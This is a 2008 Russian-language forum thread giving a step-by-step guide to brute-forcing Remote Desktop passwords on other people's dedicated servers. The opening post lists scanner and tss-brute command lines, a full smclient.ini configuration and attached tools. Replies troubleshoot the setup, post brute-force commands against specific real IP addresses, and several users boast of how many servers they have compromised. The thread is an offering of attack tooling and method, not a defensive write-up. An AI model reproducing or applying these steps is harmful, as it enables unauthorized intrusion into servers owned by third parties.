ICQ - форум. Всё про ICQ.  

Вернуться   ICQ - форум. Всё про ICQ. > Underground > Информационная безопасность

Информационная безопасность Всё о безопасности в сети. Любые просьбы о взломах караются по всей строгости закона ;)

 
 
Опции темы Рейтинг: Рейтинг темы: голосов - 9, средняя оценка - 3.11.
Старый 07.08.2008, 00:54   #1
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию Брут дедиков [by Capcha]

Расскажу вам как брутить дедики моим старым способом.

ЧТО НУЖНО??
1. Нам нужен VNC_Byauth сканер (В аттаче).
2. Нужен tss-brute (В аттаче).
3. Нужен мой скрипт на PHP для генерации BAT файлов (Смотрим в аттаче).
4. Прога от RankroR'a для выдирания гудов ,которую он делал спец. для меня качаем (В аттаче).
6. RDP 5.1 (В аттаче).
6. Как всегда руки.
7. Мозг тоже пригодится.


Начнём!!

1. Открываем cmd.exe (WIN+R), запускаем VNC_Byauth c параметрами -i xxx.xxx.xxx.xxx-yyy.yyy.yyy.yyy -p 3389 -cT -T Кол-во потоков

2. После того как сканер просканил смотрим его лог в блокноте , удаляем из списка :3389 порт оставив просто список IP адресов.

3. Ставим мой скрипт на хост или на localhost и вставляем туда наши айпишнеги и другие данные.

4. После того как скрипт выполнил своё дело создаём в папке с нашим tss-brute.exe , BAT файл и вставляем в него результат полученый после выполнения скрипта.

5. Заходим в файл smclient.ini который шол вместе с tss-brute.exe и вставляем туда мой конфиг
Код:
[dlls]
tshare=tclient.dll
;check=tclient.dll
;rs232=rs232kbd.dll
[tclient]
;timeout=120
;contimeout=20
StartRun=ShutDown...
StartRunAct=r
RunBox=Typethenameofaprogram
WinLogon=Options<<
;WinLogonAct=\x\&u\&
WinLogonAct=\&u\&
PriorWinLogon=Options>>
PriorWinLogonAct=\&o\&
NTSecurity=ShutDownWindows
NTSecurityAct=\p\p\p\p\p\l
SureLogoff=Logoff
SureLogoffAct=\n
StartLogoff=\p\p\p\p\p\72\*72\n
LogonErrorMessage=LogonMessage
LogonDisabled=Remoteloginsarecurrentlydisabled
LowSpeed=0
PersistentCache=1
;FullScreen=1
;UIClientCaption=Terminal Server Client
;UIDisconnectDialogBox=Terminal Services Client Disconnected
;UIYesNoDisconnect=Disconnect Windows session
ClientImage=mstsc.exe
[clx]
verbose=1
;GlyphEnable=1
и сохраняем.

6. Создаём в той же папке где лежит наш BAT фаил папку которую вы вписывали в скрипте(ОБЯЗАТЕЛЬНО!!!!)

7. После выполнения Брута заходим в нашу папку(см п.6) и вставляем в него программу от Rankor'а. Создаём папку output и вней output.txt

8. Вписываем в программе success , если хоть один дед сбручен программа вам покажет это, если что-то сбрутилось то смотри output.txt там вы увидите IP адресс деда и пароль.

9. Заходим в MSTSC (тобиш RDP) и проверяем наши деды ;)

10. Фсё на этом я закончил если что-то не ясно задаём вопросы тут ))

Для тех у кого не работает брут:
1. Если у вас после запуска бат файла не появляется окно РДП клиента, а запрос на ввод пароля и логина, то скачайте 5версию MSTSC и установите её в безопасном режиме.

2. Если у вас загружается окно РДП клиента, но не происходит подбор паролей, попробуйте отключить брэндмауэр. Иногда брут не может выполнять свои действия если язык на дедике не Англиский.

3. Если не происходит подбор паролей, то поменяйте в панели управления язык по умолчанию на Англиский.

3. Если у вас не работает мой скрипт (если выводит лишние слэши) , это значит что вы не залили .htaccess который идёт вместе с моим скриптом, если так и не получилось запустить, то воспользуйтесь ссылкой которая ниже на полностью работающий сайт с моим скриптом.

Спецально для тех кому не хочется парить мозг с моим скриптом RankoR написал программу для генерирования батников, качаем тут http://forum.asechka.ru/showpost.php...&postcount=270



ТЕМА ОБНОВЛЕНА, ФАЙЛЫ ЗАЛИТЫ В АТТАЧ




VIDEO F.A.Q

Конечно же отдельное спасибо metal'у за его софтину (tss-brute)
(c) Capcha [07.08.2008] Special For Asechka.ru

Копирования статьи только с разрешения автора.
Вложения
Тип файла: rar rankor.rar (186.1 Кб, 2985 просмотров)
Тип файла: rar www.rar (894 байт, 2469 просмотров)
Тип файла: rar VNC_Bypauth.rar (5.8 Кб, 2118 просмотров)
Тип файла: rar tss-brute.rar (86.8 Кб, 2676 просмотров)
Тип файла: rar RDP_client 5.1.rar (397.9 Кб, 2501 просмотров)

Последний раз редактировалось Capcha; 17.05.2009 в 00:57.
Capcha вне форума  
Плюсанули Capcha — 2 :
Старый 21.08.2008, 12:49   #201
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

RankoR, Да, у себя на компе.

mZHel, Давай по нормальному поговорим, напиши мне в аську, там всё обсудим, зачем это всё выводить на всеобщий кругозор?
Тем более это форум а не чат... Пиши, жду.
Capcha вне форума  
Старый 21.08.2008, 13:06   #202
Почти участник
 
Регистрация: 02.02.2008
Сообщений: 1,843

Репутация: 5599
По умолчанию

поменял язык, теперь он брутит, но во-первых на 1 пасс уходит секунд 15 а во-вторых несмотря на наличие валидного пасса в листе он его не угадал

Добавлено через 1 минуту
а другие брутит.. странно как-то

Последний раз редактировалось RankoR; 21.08.2008 в 13:08. Причина: Добавлено сообщение
RankoR вне форума  
Старый 21.08.2008, 13:16   #203
Участник
 
Аватар для l.sEw.l
 
Регистрация: 14.06.2008
Сообщений: 16

ICQ: 333222324

Репутация: 13
По умолчанию

Могу написать програмку на C#, которая напроч откинет использование пхп, а потому и хоста, за ненадобностью... Capcha, респект, но парс твой можно на си(++/#) за 5 минут написать и не морочить голову с хостом, если будет время, реализую.
l.sEw.l вне форума  
Старый 21.08.2008, 13:20   #204
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

l.sEw.l, Я связан только с PHP , на Си шарпе или ++ не умею писать.
Capcha вне форума  
Старый 21.08.2008, 13:26   #205
Почти участник
 
Регистрация: 02.02.2008
Сообщений: 1,843

Репутация: 5599
По умолчанию

Цитата:
Сообщение от l.sEw.l Посмотреть сообщение
на си(++/#)
нахрена тут ООП? ща йа на делфи уже дописываю
RankoR вне форума  
Старый 21.08.2008, 15:02   #206
Участник
 
Аватар для q1p
 
Регистрация: 23.04.2007
Сообщений: 121

ICQ: 151516

Репутация: 209
По умолчанию

прошу прощения, что вмешиваюсь, но не мог не ответить, TSGrinder умеет подбирать пароли только к серверам с английской локализацией интерфейса и только версии от NT до 2003, ибо Vista и Server 2008 имеют совсем другую стуктуру окна логина, о которой при написании TSGrinder'а ещё никто и не ведал
(это ответ на те посты, где затрагивалась тема якобы "простоя" и "медленного подбора", в таком случае в реальности подбор происходит но совсем не так как надо)
__________________
.

Последний раз редактировалось q1p; 21.08.2008 в 15:07.
q1p вне форума  
Старый 21.08.2008, 16:49   #207
Почти участник
 
Регистрация: 02.02.2008
Сообщений: 1,843

Репутация: 5599
По умолчанию

вот, если кому надо, генератор с Гуем
иконку поменять не могу, т.к. делфи7 глюкнула
Объяснять как им пользоваццо, я думаю не надо)
Вложения
Тип файла: rar batgen.rar (164.9 Кб, 1206 просмотров)
RankoR вне форума  
Плюсанул RankoR :
Старый 21.08.2008, 17:02   #208
Участник
 
Регистрация: 05.08.2008
Сообщений: 218

Репутация: 400
По умолчанию

))) Нафига этот софт?)) Всё сижу и никак в голову не приходит. Гуды отлично ищутся обычным Поиском по слову. Для брута по списку ипов и для скана по списку диапазонов отлично можно использовать батнеги. И тока так...
NemeZz вне форума  
Старый 21.08.2008, 17:15   #209
Участник
 
Регистрация: 24.06.2008
Сообщений: 530

Репутация: 867
По умолчанию

C:\Documents and Settings\xxx\tss-brute.exe -w C:\Documents and Settings\xxx
\pass.txt -u administrator 195.73.134.171 >>Log/195.73.134.171 .txt


RankoR, я хз но поему чет нето=)
__________________
купить номер icq
...vamp вне форума  
Старый 21.08.2008, 17:15   #210
Почти участник
 
Регистрация: 02.02.2008
Сообщений: 1,843

Репутация: 5599
По умолчанию

Цитата:
Сообщение от NemeZz Посмотреть сообщение
Для брута по списку ипов и для скана по списку диапазонов отлично можно использовать батнеги. И тока так...
а мы как делаем? О_о

Добавлено через 1 минуту
...vamp, хз, вот тока что сгенерировал батнег, кинул на дед - все нормально брутит, файлы создает
то что 1 пробел в конце имени - какбы ниче страшного

Последний раз редактировалось RankoR; 21.08.2008 в 17:16. Причина: Добавлено сообщение
RankoR вне форума  
Старый 21.08.2008, 17:19   #211
Участник
 
Регистрация: 24.06.2008
Сообщений: 530

Репутация: 867
По умолчанию

Цитата:
Сообщение от RankoR Посмотреть сообщение
...vamp, хз, вот тока что сгенерировал батнег, кинул на дед - все нормально брутит, файлы создает
то что 1 пробел в конце имени - какбы ниче страшного
это понятно
Цитата:
Сообщение от ...vamp Посмотреть сообщение
C:\Documents and Settings\xxx\tss-brute.exe -w C:\Documents and Settings\xxx
а вот это шозанах?почему w стоит посреди адреса?
__________________
купить номер icq
...vamp вне форума  
Старый 21.08.2008, 17:24   #212
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

Цитата:
Сообщение от ...vamp Посмотреть сообщение
C:\Documents and Settings\xxx\tss-brute.exe -w C:\Documents and Settings\xxx
Ты айпишнеги не вписал, или ранкор что-то не то намутил, пропущен параметр -i xxx.xxx.xxx.xxx-yyy.yyy.yyy.yyy
Capcha вне форума  
Старый 21.08.2008, 17:27   #213
Участник
 
Регистрация: 24.06.2008
Сообщений: 530

Репутация: 867
По умолчанию

Capcha, так все вписано=)и он говорит что работает
__________________
купить номер icq
...vamp вне форума  
Старый 21.08.2008, 17:33   #214
Почти участник
 
Регистрация: 02.02.2008
Сообщений: 1,843

Репутация: 5599
По умолчанию

Цитата:
tss-brute.exe -w pass.txt 207.7.218.45 >> a.txt
все правильно
капча, при чем тут -i ? O_o

Добавлено через 1 минуту
Цитата:
Сообщение от ...vamp Посмотреть сообщение
почему w стоит посреди адреса?
не совсем тя понял..

Последний раз редактировалось RankoR; 21.08.2008 в 17:34. Причина: Добавлено сообщение
RankoR вне форума  
Старый 21.08.2008, 17:38   #215
Участник
 
Регистрация: 24.06.2008
Сообщений: 530

Репутация: 867
По умолчанию

RankoR, смотри что он пишет C:\Documents and Settings\xxx\tss-brute.exe -w C:\Documents and Settings\xxx\pass.txt -u administrator 195.73.134.171 >>195.73.134.171.txt/195.73.134.171 .txt

Добавлено через 31 секунду
Цитата:
Сообщение от ...vamp Посмотреть сообщение
tss-brute.exe -w C:\Documents and Setting
это не правильно
__________________
купить номер icq

Последний раз редактировалось ...vamp; 21.08.2008 в 17:39. Причина: Добавлено сообщение
...vamp вне форума  
Старый 21.08.2008, 20:23   #216
Участник
 
Аватар для Andrew777
 
Регистрация: 16.05.2008
Сообщений: 119

Репутация: 28
По умолчанию

Наконец сбрутил более менее нормального деда. Как мона его обезопасить от повторного взлома, а то с ламерским пассом както сыкатно.
Andrew777 вне форума  
Старый 21.08.2008, 20:26   #217
Участник
 
Регистрация: 21.08.2008
Сообщений: 4

ICQ: 485567

Репутация: 0
По умолчанию

Цитата:
Сообщение от Andrew777 Посмотреть сообщение
Наконец сбрутил более менее нормального деда. Как мона его обезопасить от повторного взлома, а то с ламерским пассом както сыкатно.
никак

а я за сегодня 5дедов сбрутил тока)
.benjaz вне форума  
Старый 21.08.2008, 20:35   #218
Участник
 
Аватар для EastoN
 
Регистрация: 29.03.2008
Сообщений: 216

ICQ: 476322846

Репутация: 673
По умолчанию

Capcha, спасибо за статью

RankoR, спасибо за проги(спасибку ставить не могу, постов мало)
За сегоня снял 11 дедоф с 2к или 2к3, пару штук хр я не считаю.
Способ работает=)
EastoN вне форума  
Старый 22.08.2008, 00:49   #219
Участник
 
Аватар для EastoN
 
Регистрация: 29.03.2008
Сообщений: 216

ICQ: 476322846

Репутация: 673
По умолчанию

Capcha, вопросик: если например в списке ип для брута попался дедик, который не пингуецца или вылазит какая-либо ошибка, то почему брут не продолжает работать, пока не закроешь руками эту ошибку? Это можно как-то исправить? Просто ооочень неудобно, когда оставляешь брут на дедике и куда-то уходишь, а когда приходишь, то видишь, что пробрутилось не половина сорса, а 10 дедоф. На одиннадцатом брут застопорился из-за ошибки и всё...
EastoN вне форума  
Старый 22.08.2008, 01:01   #220
Участник
 
Аватар для q1p
 
Регистрация: 23.04.2007
Сообщений: 121

ICQ: 151516

Репутация: 209
По умолчанию

easton, TSGrinder на это не расчитан, изначально он предназначался для брута одного сервера, а батники это уже идея народных умельцев
__________________
.
q1p вне форума  
Старый 22.08.2008, 01:16   #221
Участник
 
Аватар для EastoN
 
Регистрация: 29.03.2008
Сообщений: 216

ICQ: 476322846

Репутация: 673
По умолчанию

q1p, может можно написать какую-то утилитку, которая сидела бы в памяти компа/дедика и завершала процесс с опр. названием?
EastoN вне форума  
Старый 22.08.2008, 01:45   #222
Участник
 
Аватар для q1p
 
Регистрация: 23.04.2007
Сообщений: 121

ICQ: 151516

Репутация: 209
По умолчанию

easton, можно, но в данном случае это не будет корректным решением этой проблемы
__________________
.
q1p вне форума  
Старый 22.08.2008, 01:52   #223
Участник
 
Аватар для EastoN
 
Регистрация: 29.03.2008
Сообщений: 216

ICQ: 476322846

Репутация: 673
По умолчанию

q1p, почему? Ведь те ошибки, которые вылазят, они же как-то называюцца в процессах) Почему незя их завершать?
EastoN вне форума  
Старый 22.08.2008, 01:58   #224
Участник
 
Аватар для q1p
 
Регистрация: 23.04.2007
Сообщений: 121

ICQ: 151516

Репутация: 209
По умолчанию

easton, процесс один и тот же всегда, это mstsc.exe, если его завершать по таймеру то это может произойти во время работы
с другой стороны, можно просто закрывать эти сообщения об ошибках, стукни завтра в ацку, если по времени завтра получится, то будет тебе такая программулька
__________________
.
q1p вне форума  
Старый 22.08.2008, 02:23   #225
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

easton, Описывалось выше, что это делается с помощью timeout глянь посты выше.
Capcha вне форума  
 

Метки
brute, dedicated server

Опции темы
Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +3, время: 06:17.


Перевод: zCarot
Форум Асечников © Asechka.RU

Новости Сочи Коротко обо всем